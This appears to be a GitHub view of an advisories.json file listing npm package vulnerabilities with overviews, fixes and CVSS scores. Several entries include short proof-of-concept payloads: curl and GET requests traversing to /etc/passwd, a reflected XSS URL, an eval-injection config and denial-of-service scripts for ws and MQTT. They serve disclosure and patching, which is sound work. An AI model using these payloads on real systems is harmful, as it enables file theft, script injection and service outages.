forked from pagopa/io-backend
-
Notifications
You must be signed in to change notification settings - Fork 0
/
advisories.json
13260 lines (13260 loc) · 652 KB
/
advisories.json
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
877
878
879
880
881
882
883
884
885
886
887
888
889
890
891
892
893
894
895
896
897
898
899
900
901
902
903
904
905
906
907
908
909
910
911
912
913
914
915
916
917
918
919
920
921
922
923
924
925
926
927
928
929
930
931
932
933
934
935
936
937
938
939
940
941
942
943
944
945
946
947
948
949
950
951
952
953
954
955
956
957
958
959
960
961
962
963
964
965
966
967
968
969
970
971
972
973
974
975
976
977
978
979
980
981
982
983
984
985
986
987
988
989
990
991
992
993
994
995
996
997
998
999
1000
[
{
"id": 564,
"created_at": "2018-01-25T17:02:12.166+00:00",
"updated_at": "2018-01-25T17:24:36.307+00:00",
"title": "Fastify denial-of-service vulnerability with large JSON payloads",
"author": "nwoltman (https://github.com/nwoltman)",
"module_name": "fastify",
"publish_date": "2018-01-25T17:24:36.306+00:00",
"cves": [
"CVE-2018-3711"
],
"vulnerable_versions": "<=0.37.0",
"patched_versions": ">=0.38.0",
"slug": "fastify_fastify-denial-of-service-vulnerability-with-large-json-payloads",
"overview": "Fastify prior to 0.37.0 is vulnerable to a denial-of-service attack by sending a request with Content-Type set to application/json and a very large payload.",
"recommendation": "Update to version 0.38.0 or later.",
"references": "- https://github.com/fastify/fastify/commit/fabd2a011f2ffbb877394abe699f549513ffbd76\n- https://github.com/fastify/fastify/releases/tag/v0.38.0\n- https://hackerone.com/reports/303632",
"legacy_slug": null,
"allowed_scopes": [
"public",
"early",
"admin"
],
"cvss_vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"cvss_score": 7.5,
"cwe": "119"
},
{
"id": 563,
"created_at": "2018-01-23T18:40:39.78+00:00",
"updated_at": "2018-01-25T16:45:38.162+00:00",
"title": "Remote Code Execution",
"author": "Zeke Sikelianos",
"module_name": "electron",
"publish_date": "2018-01-23T18:57:03.334+00:00",
"cves": [
"CVE-2018-1000006"
],
"vulnerable_versions": "< 1.6.16 || >=1.7 <1.7.11 || >= 1.8 <1.8.2-beta.4",
"patched_versions": ">=1.6.16 <1.7.0|| >=1.7.11 > 1.8.0 || >=1.8.2-beta.4",
"slug": "electron_remote-code-execution",
"overview": "Electron applications running on Windows are vulnerable to a remote code execution flaw when they register themselves as the default handler for a protocol, such as `nodeapp://`.\n\nThis vulnerability is caused by a failure to sanitize additional arguments to chromium in the command line handler for Electron.\n\nMacOS and Linux are not vulnerable.",
"recommendation": "Update electron to a version that is not vulnerable. If updating is not possible, the electron team has provided the following guidance:\n\n\nIf for some reason you are unable to upgrade your Electron version, you can append `--` as the last argument when calling `app.setAsDefaultProtocolClient`, which prevents Chromium from parsing further options. The double dash `--` signifies the end of command options, after which only positional parameters are accepted.\n```\napp.setAsDefaultProtocolClient(protocol, process.execPath, [\n '--your-switches-here',\n '--'\n])\n```",
"references": "https://electronjs.org/blog/protocol-handler-fix",
"legacy_slug": null,
"allowed_scopes": [
"public",
"early",
"admin"
],
"cvss_vector": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
"cvss_score": 9.6,
"cwe": "94"
},
{
"id": 562,
"created_at": "2018-01-23T17:37:30.926+00:00",
"updated_at": "2018-01-23T17:42:42.631+00:00",
"title": "Reflected Cross-Site Scripting",
"author": "Yasin Soliman (ysx)",
"module_name": "redis-commander",
"publish_date": "2018-01-23T17:42:42.631+00:00",
"cves": [],
"vulnerable_versions": "<=99.999.99999",
"patched_versions": "<0.0.0",
"slug": "redis-commander_reflected-cross-site-scripting",
"overview": "`redis-commander` is a Redis management tool written in node.js\n\nMalicious input in the `highlighterId` parameter of the clipboard.swf component can be leveraged in a reflected XSS on hosts serving Redis Commander.\n\nMitigating factors:\nFlash must be installed / enabled for this to work. The below proof of concept was verified to work using Firefox 57.0 on Windows 10 by manually installing the [Flash NPAPI Windows plugin](https://get.adobe.com/flashplayer/otherversions/)\n\nProof of concept:\n\n```\nhttp://instance/jstree/_docs/syntax/clipboard.swf?highlighterId=\\%22))}%20catch(e)%20{alert(document.domain);}//\n```",
"recommendation": null,
"references": "- https://hackerone.com/reports/296377",
"legacy_slug": null,
"allowed_scopes": [
"public",
"early",
"admin"
],
"cvss_vector": null,
"cvss_score": null,
"cwe": "79"
},
{
"id": 561,
"created_at": "2018-01-23T16:55:06.669+00:00",
"updated_at": "2018-01-23T17:02:39.654+00:00",
"title": "Directory Traversal",
"author": "bl4de (https://twitter.com/_bl4de)",
"module_name": "serve",
"publish_date": "2018-01-23T17:02:39.653+00:00",
"cves": [
"CVE-2018-3712"
],
"vulnerable_versions": "<=6.4.8",
"patched_versions": ">=6.4.9",
"slug": "serve_directory-traversal",
"overview": "`serve` is a module which allows a user to server static files and browse directories in the browser.\n\n`serve` does not properly handle `%2e` (.) and `%2f` (/) and allows these characters to be used in paths, which can be used to traverse the directory tree up and lists content of any directory the user running the process has access to.\n\nMitigating factors:\nThis vulnerability only allows listing of directory contents and does not allow reading of arbitrary files.",
"recommendation": "Upgrade to version 6.4.9 or greater by running `npm install serve@latest`",
"references": "- https://hackerone.com/reports/307666",
"legacy_slug": null,
"allowed_scopes": [
"public",
"early",
"admin"
],
"cvss_vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"cvss_score": 5.3,
"cwe": "22"
},
{
"id": 411,
"created_at": "2017-07-02T02:17:45.346+00:00",
"updated_at": "2018-01-23T16:43:20.403+00:00",
"title": "Directory Traversal",
"author": "Liang Gong",
"module_name": "ltt.js",
"publish_date": "2018-01-23T16:43:20.402+00:00",
"cves": [],
"vulnerable_versions": "<=99.999.99999",
"patched_versions": "<0.0.0",
"slug": "lttjs_directory-traversal",
"overview": "`ltt.js` is a simple file server.\n\n`ltt.js` is vulnerable to a directory traversal issue, giving an attacker access to the filesystem by placing \"../\" in the url.\n\nExample Request:\n```\nGET /../../../../../../../../../../etc/passwd HTTP/1.1\nhost: localhost\n```\n and server Response:\n```\nHTTP/1.1 200 OK\nDate: Thu, 04 May 2017 23:59:18 GMT\nConnection: keep-alive\nTransfer-Encoding: chunked\n\n{contents of /etc/passwd}\n```",
"recommendation": "Because there is no fix for this module, we recommend using a different one.",
"references": "* [POC by Liang Gong](https://github.com/JacksonGL/NPM-Vuln-PoC/blob/master/directory-traversal/ltt.js)",
"legacy_slug": null,
"allowed_scopes": [
"public",
"early",
"admin"
],
"cvss_vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"cvss_score": 7.5,
"cwe": "22"
},
{
"id": 451,
"created_at": "2017-07-17T20:56:08.497+00:00",
"updated_at": "2018-01-23T16:42:58.028+00:00",
"title": "Directory Traversal",
"author": "Liang Gong",
"module_name": "yjmyjmyjm",
"publish_date": "2018-01-23T16:42:58.027+00:00",
"cves": [],
"vulnerable_versions": "<=99.999.9999",
"patched_versions": "<0.0.0",
"slug": "yjmyjmyjm_directory-traversal",
"overview": "`yjmyjmyjm` is a static file server.\n\n`yjmyjmyjm` is vulnerable to a directory traversal issue, giving an attacker access to the filesystem by placing \"../\" in the url.\n\nExample Request:\n```\nGET /../../../../../../../../../../etc/passwd HTTP/1.1\nhost:localhost\n```\nand the server's Response\n```\nHTTP/1.1 200 OK\nDate: Thu, 04 May 2017 23:59:18 GMT\nConnection: keep-alive\nTransfer-Encoding: chunked\n\n{contents of /etc/passwd}\n```",
"recommendation": "Because there is no fix currently, we recommend using a different module.",
"references": "* [Proof of Concept from Liang Gong](https://github.com/JacksonGL/NPM-Vuln-PoC/blob/master/directory-traversal/yjmyjmyjm)",
"legacy_slug": null,
"allowed_scopes": [
"public",
"early",
"admin"
],
"cvss_vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"cvss_score": 7.5,
"cwe": "22"
},
{
"id": 560,
"created_at": "2018-01-23T16:40:27.502+00:00",
"updated_at": "2018-01-23T16:40:56.516+00:00",
"title": "Directory Traversal",
"author": "Yasin Soliman (ysx)",
"module_name": "lactate",
"publish_date": "2018-01-23T16:40:27.5+00:00",
"cves": [],
"vulnerable_versions": "<=99.999.99999",
"patched_versions": "<0.0.0",
"slug": "directory-traversa_directory-traversal",
"overview": "A crafted `GET` request can be leveraged to traverse the directory structure of a host using the lactate web server package, and request arbitrary files outside of the specified web root. This allows for a remote attacker to gain access to arbitrary files on the filesystem that the process has access to read.\n\nMitigating factors:\nOnly files that the user running `lactate` has permission to read will be accessible via this vulnerability.\n\n\n[Proof of concept](https://hackerone.com/reports/296645):\nPlease globally install the `lactate` package and `cd` to a directory you wish to serve assets from. Next, run `lactate -p 8081` to start serving files from this location.\n\nThe following cURL request can be used to demonstrate this vulnerability by requesting the target `/etc/passwd` file:\n\n```\ncurl \"http://127.0.0.1:8081/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd\"\n```\n```\nroot:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\nsys:x:3:3:sys:/dev:/usr/sbin/nologin\n[...]\n```",
"recommendation": "As there is currently no fix for this issue selecting an alternative static web server would be the best choice.",
"references": "- https://hackerone.com/reports/296645",
"legacy_slug": null,
"allowed_scopes": [
"public",
"early",
"admin"
],
"cvss_vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"cvss_score": 7.5,
"cwe": "22"
},
{
"id": 559,
"created_at": "2018-01-23T16:29:37.078+00:00",
"updated_at": "2018-01-23T16:37:15.304+00:00",
"title": "Directory Traversal",
"author": "Yasin Soliman (ysx)",
"module_name": "augustine",
"publish_date": "2018-01-23T16:29:48.657+00:00",
"cves": [],
"vulnerable_versions": "<=99.999.99999",
"patched_versions": "<0.0.0",
"slug": "augustine_directory-traversal",
"overview": "A crafted GET request can be leveraged to traverse the directory structure of a host using the `augustine` web server package, and request arbitrary files outside of the specified web root. This allows for a remote attacker to gain access to arbitrary files on the filesystem that the process has access to read.\n\nMitigating factors:\nOnly files that the user running `augustine` has permission to read will be accessible via this vulnerability.\n\n[Proof of concept](https://hackerone.com/reports/296282):\n\nFirst you must install the `augustine` package and cd to a directory you wish to serve assets from. Next, run `augustine --port 8081` to start serving from this location.\n\nThe following cURL request can be used to demonstrate this vulnerability by requesting the target /etc/passwd file. Due to the nature of this traversal, browsing to the below URL will also display the passwd file: \n\n```\ncurl \"http://127.0.0.1:8081//etc/passwd\"\n```\n\n```\nroot:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\nsys:x:3:3:sys:/dev:/usr/sbin/nologin\n[...]\n```",
"recommendation": "As there is currently no fix for this issue selecting an alternative static web server would be the best choice.",
"references": "- https://hackerone.com/reports/296282",
"legacy_slug": null,
"allowed_scopes": [
"public",
"early",
"admin"
],
"cvss_vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"cvss_score": 7.5,
"cwe": "22"
},
{
"id": 317,
"created_at": "2017-03-07T20:43:52+00:00",
"updated_at": "2018-01-15T18:13:27.025+00:00",
"title": "Arbitrary Code Injection",
"author": "Cristian-Alexandru Staicu",
"module_name": "mobile-icon-resizer",
"publish_date": "2018-01-15T18:13:27.024+00:00",
"cves": [],
"vulnerable_versions": ">=0.2.0 <=0.4.2",
"patched_versions": ">=0.4.3",
"slug": "mobile-icon-resizer_arbitrary-code-injection",
"overview": "mobile-icon-resizer resizes large images for use as icons for iOS and Android.\n\nmobile-icon-resizer has a code execution vulnerability in versions before 0.4.3.\n\nmobile-icon-resizer takes an options object as an argument to define the resulting icons as such:\n```\nvar options = {\n config: './config.js'\n}\nresize(options, function(err){});\n```\nconfig.js would need to be a file on the filesystem and look something like:\n```\nvar config = {\n iOS: {\n \"images\": [\n /* iOS image definitions are not vulnerable */\n ]\n },\n android: {\n \"images\" : [\n {\n \"baseRatio\" : \"console.log('Executing script as baseRatio property')\",\n \"folder\" : \"drawable-ldpi\"\n },\n {\n \"ratio\" : \"console.log('Executing script as ratio property')\",\n \"folder\" : \"drawable-mdpi\"\n },\n /* other android image defintiions ... */\n ]\n }\n};\n\nexports = module.exports = config;\n```\nThe parameters `ratio` and `baseRatio` are passed directly to `eval()`, thus allowing dynamic javascript payloads to be executed.",
"recommendation": "Upgrade to v0.4.3 or later.",
"references": "- [Github Issue](https://github.com/muzzley/mobile-icon-resizer/issues/8)",
"legacy_slug": null,
"allowed_scopes": [
"public",
"early",
"admin"
],
"cvss_vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"cvss_score": 9.8,
"cwe": "94"
},
{
"id": 555,
"created_at": "2018-01-12T21:18:46.559+00:00",
"updated_at": "2018-01-17T18:47:20.865+00:00",
"title": "Denial of Service",
"author": "mcollina",
"module_name": "mqtt",
"publish_date": "2018-01-15T18:11:39.891+00:00",
"cves": [
"CVE-2017-10910"
],
"vulnerable_versions": ">=2.0.0 <=2.14.0",
"patched_versions": ">=2.15.0",
"slug": "mqtt_denial-of-service",
"overview": "MQTT.js is a client for the MQTT protocol. Version 2.x.x, prior to 2.15.0, does not properly handle PUBLISH packets returning from the server, leading to a Denial of Service condition.\n\nThe vulnerability is completely mitigated if the only connected servers are trusted, guaranteed not to be under the control of a malicious actor.\n\nProof of Concept:\nThe following is a demonstration of how to generate the malicious packet sequence, but does not include information on handling the initial network connections and MQTT overhead.\n```\nvar mqttp = require('mqtt-packet');\nvar packets = [];\nfor(var i=0; i<=1000;i++){\n packets.push(\n mqttp.generate({\n cmd:'publish',\n topic:Buffer.from('hello'),\n payload:Buffer.from('world'),\n retain: false,\n dup: false, \n messageId: ++i, \n qos: 1\n })\n )\n}\n\n```",
"recommendation": "If the affected library makes connections to untrusted mqtt servers, update mqtt.js to version 2.15.0 or greater.",
"references": "- https://github.com/mqttjs/MQTT.js/commit/403ba53b838f2d319a0c0505a045fe00239e9923\n- https://github.com/nodejs/security-wg/blob/master/vuln/npm/357.json",
"legacy_slug": null,
"allowed_scopes": [
"public",
"early",
"admin"
],
"cvss_vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
"cvss_score": 4.3,
"cwe": "400"
},
{
"id": 556,
"created_at": "2018-01-12T22:05:45.602+00:00",
"updated_at": "2018-01-15T18:08:24.249+00:00",
"title": "Directory Traversal",
"author": "Yasin Soliman",
"module_name": "featurebook",
"publish_date": "2018-01-15T18:08:24.248+00:00",
"cves": [],
"vulnerable_versions": "<=0.0.32",
"patched_versions": "<0.0.0",
"slug": "featurebook_directory-traversal",
"overview": "The featurebook module uses Gherkin source files to generate system configurations. All versions up to and including 0.0.32 are vulnerable to a Directory Traversal attack. This may allow attackers to access confidential resources that exist outside of the intended web root of the service.\n\nThis is mitigated significantly by the fact that featurebook is clearly not intended to be run in production code nor to be exposed to an untrusted network.",
"recommendation": "Ensure that the featurebook server is not running in production or exposed to an untrusted network.",
"references": "https://github.com/nodejs/security-wg/blob/master/vuln/npm/358.json",
"legacy_slug": null,
"allowed_scopes": [
"public",
"early",
"admin"
],
"cvss_vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N/E:H/RL:O/RC:C/MAV:N/MAC:H",
"cvss_score": 4.3,
"cwe": "22"
},
{
"id": 558,
"created_at": "2018-01-15T17:06:33.747+00:00",
"updated_at": "2018-01-15T17:07:03.985+00:00",
"title": "Identity Spoofing",
"author": "Maciej Krüger",
"module_name": "libp2p-secio",
"publish_date": "2018-01-15T17:07:03.984+00:00",
"cves": [],
"vulnerable_versions": "<=0.8.1",
"patched_versions": ">0.8.1",
"slug": "libp2p-secio_identity-spoofing",
"overview": "libp2p-secio provides a SECIO implementation in JavaScript.\n\nIt was discovered by [Maciej Krüger](https://github.com/mkg20001) to be vulnerable to an identity spoofing attack. libp2p-secio was not correctly checking the that the PeerId of the DstPeer matched the PeerId that the peer learns through the Crypto Handshake creating a high severity vulnerability as the purpose of SECIO is to authenticate the other Peer.",
"recommendation": "All users should upgrade to version 0.9.0 or greater.\n\nTo install the latest version run `npm install libp2p-secio`",
"references": "This issue was fixed by [David Dias](http://github.com/diasdavid/) through [this Pull Request](https://github.com/libp2p/js-libp2p-secio/pull/95)",
"legacy_slug": null,
"allowed_scopes": [
"public",
"early",
"admin"
],
"cvss_vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
"cvss_score": 9.1,
"cwe": "290"
},
{
"id": 557,
"created_at": "2018-01-15T04:50:14.726+00:00",
"updated_at": "2018-01-15T04:52:05.295+00:00",
"title": "Directory Traversal",
"author": "Yasin Soliman",
"module_name": "@vivaxy/here",
"publish_date": "2018-01-15T04:52:05.294+00:00",
"cves": [],
"vulnerable_versions": "<=3.2.1",
"patched_versions": ">=3.2.2",
"slug": "vivaxyhere_directory-traversal",
"overview": "The @vivaxy/here module is a small web server that serves files with the process' working directory acting as the web root.\n\nIt is vulnerable to a directory traversal attack. \n\nThis means that files on the local file system which exist outside of the web root may be disclosed to an attacker. This might include confidential files.\n\nMitigating Factors:\nIf the node process is run as a user with very limited filesystem permissions, there is significantly less risk of exposing confidential/private information.\n\n\nProof of Concept:\n```\ncurl \"http://${SERVER_IP}:${SERVER_PORT}/..%2f..%2fetc/passwd\"\n```",
"recommendation": "Run `npm i @vivaxy/here` to install the latest version that addresses this vulnerability.",
"references": "- https://github.com/vivaxy/here/commit/298dbab41344dfb7f95f66b1fa7b5cfb436bd4a2\n- https://hackerone.com/reports/296254",
"legacy_slug": null,
"allowed_scopes": [
"public",
"early",
"admin"
],
"cvss_vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:H/RL:O/RC:C/MAV:N/MAC:H",
"cvss_score": 7.5,
"cwe": "22"
},
{
"id": 554,
"created_at": "2018-01-11T23:16:24.503+00:00",
"updated_at": "2018-01-15T04:40:13.124+00:00",
"title": "Directory Traversal",
"author": "Yasin Soliman",
"module_name": "serve-here",
"publish_date": "2018-01-12T00:03:03.5+00:00",
"cves": [],
"vulnerable_versions": "<=99.999.99999",
"patched_versions": "<0.0.0",
"slug": "serve-here_directory-traversal-in-serve-here",
"overview": "The serve-here module is a small web server that serves files with the process' working directory acting as the web root.\n\nIt is vulnerable to a directory traversal attack. \n\nThis means that files on the local file system which exist outside of the web root may be disclosed to an attacker. This might include confidential files.\n\nMitigating Factors:\nIf the node process is run as a user with very limited filesystem permissions, there is significantly less risk of exposing confidential/private information.\n\n\nProof of Concept:\n```\ncurl \"http://${SERVER_IP}:${SERVER_PORT}/..%2f..%2fetc/passwd\"\n```",
"recommendation": "serve-here has been [deprecated by the author](https://github.com/vivaxy/here/issues/18) and replaced by [@vivaxy/here](https://www.npmjs.com/package/@vivaxy/here)\n\nrun `npm i @vivaxy/here` to install the new module.",
"references": "- https://github.com/vivaxy/here/commit/298dbab41344dfb7f95f66b1fa7b5cfb436bd4a2\n- https://hackerone.com/reports/296254",
"legacy_slug": null,
"allowed_scopes": [
"public",
"early",
"admin"
],
"cvss_vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N/E:H/RL:O/RC:C/MAV:N/MAC:H",
"cvss_score": 7.5,
"cwe": "22"
},
{
"id": 553,
"created_at": "2017-12-13T21:56:08.162+00:00",
"updated_at": "2017-12-15T16:52:56.532+00:00",
"title": "Denial of Service",
"author": "Checkmarx",
"module_name": "ecstatic",
"publish_date": "2017-12-13T21:56:27.632+00:00",
"cves": [
"CVE-2016-10703"
],
"vulnerable_versions": "< 2.0.0",
"patched_versions": ">=2.0.0",
"slug": "ecstatic_denial-of-service",
"overview": "`ecstatic`, a simple static file server middleware, is vulnerable to denial of service. If a payload with a large number of null bytes (`%00`) is provided by an attacker it can crash ecstatic by running it out of memory.\n\n\n[Results from the original advisory](https://www.checkmarx.com/advisories/denial-of-service-dos-vulnerability-in-ecstatic-npm-package/)\n\n```\nA payload of 22kB caused a lag of 1 second,\nA payload of 35kB caused a lag of 3 seconds,\nA payload of 86kB caused the server to crash\n```",
"recommendation": "Upgrade to the latest version.",
"references": "- https://github.com/jfhbrook/node-ecstatic/commit/71ce93988ead4b561a8592168c72143907189f01#diff-b2b5a88fb51675f1aa1065c093dce1ee\n- https://www.checkmarx.com/advisories/denial-of-service-dos-vulnerability-in-ecstatic-npm-package/",
"legacy_slug": null,
"allowed_scopes": [
"public",
"early",
"admin"
],
"cvss_vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"cvss_score": 5.3,
"cwe": "400"
},
{
"id": 552,
"created_at": "2017-12-06T04:29:54.799+00:00",
"updated_at": "2017-12-06T04:30:12.962+00:00",
"title": "Arbitrary Code Execution",
"author": "Masato Kinugawa",
"module_name": "mathjs",
"publish_date": "2017-12-06T04:30:12.961+00:00",
"cves": [
"CVE-2017-1001002"
],
"vulnerable_versions": "<3.17.0",
"patched_versions": ">=3.17.0",
"slug": "mathjs_arbitrary-code-execution",
"overview": "math.js before 3.17.0 had an arbitrary code execution in the JavaScript engine. Creating a typed function with JavaScript code in the name could result arbitrary execution.",
"recommendation": "Upgrade to version 3.17.0 or greater.",
"references": "- [GitHub Changelog](https://github.com/josdejong/mathjs/blob/master/HISTORY.md#2017-11-18-version-3170)\n- [GitHub Commit](https://github.com/josdejong/mathjs/commit/8d2d48d81b3c233fb64eb2ec1d7a9e1cf6a55a90)",
"legacy_slug": null,
"allowed_scopes": [
"public",
"early",
"admin"
],
"cvss_vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"cvss_score": 9.8,
"cwe": "94"
},
{
"id": 551,
"created_at": "2017-12-06T04:27:25.91+00:00",
"updated_at": "2017-12-06T04:27:36.83+00:00",
"title": "Arbitrary Code Execution",
"author": "Masato Kinugawa",
"module_name": "mathjs",
"publish_date": "2017-12-06T04:27:36.829+00:00",
"cves": [
"CVE-2017-1001003"
],
"vulnerable_versions": "<3.17.0",
"patched_versions": ">=3.17.0",
"slug": "mathjs_arbitrary-code-execution",
"overview": "math.js before 3.17.0 had an issue where private properties such as a constructor could be replaced by using unicode characters when creating an object.",
"recommendation": "Upgrade to version 3.17.0 or greater.",
"references": "- [GitHub Commit](https://github.com/josdejong/mathjs/commit/a60f3c8d9dd714244aed7a5569c3dccaa3a4e761)\n- [GitHub Changelog](https://github.com/josdejong/mathjs/blob/master/HISTORY.md#2017-11-18-version-3170)",
"legacy_slug": null,
"allowed_scopes": [
"public",
"early",
"admin"
],
"cvss_vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"cvss_score": 9.8,
"cwe": "94"
},
{
"id": 532,
"created_at": "2017-09-21T20:40:00.889+00:00",
"updated_at": "2017-11-29T17:55:56.935+00:00",
"title": "Regular Expression Denial of Service",
"author": "Cristian-Alexandru Staicu",
"module_name": "moment",
"publish_date": "2017-11-27T17:56:00.056+00:00",
"cves": [],
"vulnerable_versions": "<2.19.3",
"patched_versions": ">=2.19.3",
"slug": "moment_regular-expression-denial-of-service",
"overview": "Moment is vulnerable to a low severity regular expression denial of service vulnerability.",
"recommendation": "Update to version 2.19.3",
"references": "- https://github.com/moment/moment/issues/4163\n- https://github.com/moment/moment/pull/4326",
"legacy_slug": null,
"allowed_scopes": [
"public",
"early",
"admin"
],
"cvss_vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"cvss_score": 7.5,
"cwe": "400"
},
{
"id": 550,
"created_at": "2017-11-08T19:25:17.211+00:00",
"updated_at": "2017-11-10T17:26:26.645+00:00",
"title": "Denial of Service",
"author": "Nick Starke, Ryan Knell",
"module_name": "ws",
"publish_date": "2017-11-08T19:26:00.965+00:00",
"cves": [],
"vulnerable_versions": "<1.1.5 || >=2.0.0 <3.3.1",
"patched_versions": ">= 1.1.5 <2.0.0 || >=3.3.1",
"slug": "ws_denial-of-service",
"overview": "A specially crafted value of the `Sec-WebSocket-Extensions` header that used `Object.prototype` property names as extension or parameter names could be used to make a ws server crash.\n\nProof of concept:\n\n```\nconst WebSocket = require('ws');\nconst net = require('net');\n\nconst wss = new WebSocket.Server({ port: 3000 }, function () {\n const payload = 'constructor'; // or ',;constructor'\n\n const request = [\n 'GET / HTTP/1.1',\n 'Connection: Upgrade',\n 'Sec-WebSocket-Key: test',\n 'Sec-WebSocket-Version: 8',\n `Sec-WebSocket-Extensions: ${payload}`,\n 'Upgrade: websocket',\n '\\r\\n'\n ].join('\\r\\n');\n\n const socket = net.connect(3000, function () {\n socket.resume();\n socket.write(request);\n });\n});\n```",
"recommendation": "Upgrade to version 3.3.1 or greater",
"references": "- https://github.com/websockets/ws/commit/c4fe46608acd61fbf7397eadc47378903f95b78a\n- https://github.com/websockets/ws/releases/tag/3.3.1",
"legacy_slug": null,
"allowed_scopes": [
"public",
"early",
"admin"
],
"cvss_vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"cvss_score": 7.5,
"cwe": "20"
},
{
"id": 549,
"created_at": "2017-10-24T21:37:29.037+00:00",
"updated_at": "2017-11-30T21:51:57.871+00:00",
"title": "Silently Runs Cryptocoin Miner",
"author": null,
"module_name": "hooka-tools",
"publish_date": "2017-10-25T02:52:40.985+00:00",
"cves": [],
"vulnerable_versions": "<=99.999.99999",
"patched_versions": "<0.0.0",
"slug": "hooka-tools_silently-runs-cryptocoin-miner",
"overview": "The `hooka-tools` module was updated to silently run a cryptocoin miner in the background.",
"recommendation": "Do not install / use this module. It has been unpublished from the registry but may exist in some caches.",
"references": null,
"legacy_slug": null,
"allowed_scopes": [
"public",
"early",
"admin"
],
"cvss_vector": null,
"cvss_score": null,
"cwe": "506"
},
{
"id": 410,
